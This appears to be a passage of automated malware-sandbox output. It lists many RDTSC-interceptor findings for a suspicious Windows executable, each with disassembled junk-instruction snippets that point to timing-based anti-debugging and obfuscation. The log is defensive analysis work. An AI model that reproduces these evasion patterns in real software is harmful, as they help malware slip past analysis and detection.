                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BF0 second address: 1004BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BF4 second address: 1004C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B9h 0x00000007 ja 00007F230C5197A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004C1A second address: 1004C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004EEC second address: 1004EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004EF0 second address: 1004F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F230C515278h 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F230C51527Ch 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F0F second address: 1004F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F230C5197ABh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F25 second address: 1004F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10053BD second address: 10053CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10087A3 second address: 10087B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515282h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10087B9 second address: 10087CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jp 00007F230C5197A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F52 second address: 1007F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F230C515282h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F69 second address: 1007F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F6F second address: 1007F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F75 second address: 1007F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008129 second address: 1008148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F230C515289h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008148 second address: 100814E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10082E6 second address: 1008303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515288h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008303 second address: 100831E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F230C5197AAh 0x0000000a jmp 00007F230C5197AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB5A second address: 100AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB5E second address: 100AB75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F230C5197B1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB75 second address: 100AB8A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F230C515287h 0x00000008 jmp 00007F230C51527Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A894 second address: 100A8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c jng 00007F230C5197A6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F3F2 second address: 100F3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F3F6 second address: 100F3FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EC93 second address: 100EC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EC97 second address: 100ECDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F230C5197B6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 popad 0x00000013 push esi 0x00000014 push ecx 0x00000015 jmp 00007F230C5197ACh 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100ECDB second address: 100ECDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101315F second address: 1013168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013168 second address: 101316C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101316C second address: 1013170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012740 second address: 1012758 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F230C515280h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10128D7 second address: 10128E1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F230C5197A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10128E1 second address: 1012912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b jo 00007F230C51529Bh 0x00000011 pushad 0x00000012 jmp 00007F230C515283h 0x00000017 jmp 00007F230C51527Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A1B second address: 1012A25 instructions: 0x00000000 rdtsc 0x00000002 je 00007F230C5197ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A25 second address: 1012A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F230C515287h 0x0000000e jmp 00007F230C51527Fh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jno 00007F230C51527Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A50 second address: 1012A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A59 second address: 1012A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A65 second address: 1012A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012D53 second address: 1012D5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F230C515276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1018794 second address: 10187A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187A6 second address: 10187B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187B4 second address: 10187BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187BA second address: 10187BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187BE second address: 10187CE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10207A3 second address: 10207A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EEC1 second address: 101EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnp 00007F230C5197A6h 0x0000000c jg 00007F230C5197A6h 0x00000012 jns 00007F230C5197A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EEDB second address: 101EEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007F230C515276h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EEEA second address: 101EEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F193 second address: 101F197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F764 second address: 101F768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F768 second address: 101F76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F76E second address: 101F786 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F230C5197A6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F230C5197A6h 0x00000012 jo 00007F230C5197A6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F786 second address: 101F7BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F230C515276h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007F230C515286h 0x00000016 jmp 00007F230C515281h 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDAC second address: 101FDC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F230C5197A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDC3 second address: 101FDE8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F230C515276h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F230C515285h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102010F second address: 102014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jnp 00007F230C5197EBh 0x0000000c jmp 00007F230C5197B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F230C5197B9h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027F0C second address: 1027F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515288h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028192 second address: 1028199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028199 second address: 10281C3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F230C51527Ah 0x00000008 push ecx 0x00000009 jmp 00007F230C51527Eh 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F230C515276h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10281C3 second address: 10281D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F230C5197A6h 0x00000009 jns 00007F230C5197A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028480 second address: 1028485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028485 second address: 1028493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F230C5197A6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028493 second address: 10284BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F230C515276h 0x0000000a jp 00007F230C515276h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F230C515282h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10284BC second address: 10284D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 js 00007F230C5197A8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 jng 00007F230C5197A6h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103002B second address: 1030030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030030 second address: 103004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F230C5197A6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F230C5197ADh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103004E second address: 1030052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E18D second address: 102E193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E193 second address: 102E19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E19E second address: 102E1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E1A2 second address: 102E1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E1A8 second address: 102E1AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E1AD second address: 102E1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007F230C51527Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E8C8 second address: 102E8F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F230C5197ADh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EA39 second address: 102EA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C51527Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c je 00007F230C515288h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EA6A second address: 102EA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EA74 second address: 102EA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102ED1E second address: 102ED40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F230C5197B4h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EEA2 second address: 102EEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FE32 second address: 102FE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10389DF second address: 1038A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F230C515289h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F230C51527Ah 0x00000011 popad 0x00000012 jp 00007F230C51528Dh 0x00000018 jmp 00007F230C515281h 0x0000001d js 00007F230C515276h 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 ja 00007F230C515278h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038A33 second address: 1038A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1038A4A second address: 1038A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1044B83 second address: 1044B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1047A84 second address: 1047A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F230C515276h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1047A93 second address: 1047A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1047C05 second address: 1047C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jmp 00007F230C515284h 0x0000000e jl 00007F230C515276h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055DA8 second address: 1055DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055DAC second address: 1055DC1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C515276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F230C51527Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055DC1 second address: 1055DC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105E9E8 second address: 105E9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105E9EC second address: 105E9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105E9F4 second address: 105EA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F230C515283h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D2B9 second address: 105D2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D2BF second address: 105D2CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D2CB second address: 105D2CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D557 second address: 105D581 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F230C515284h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F230C515280h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D6FA second address: 105D713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
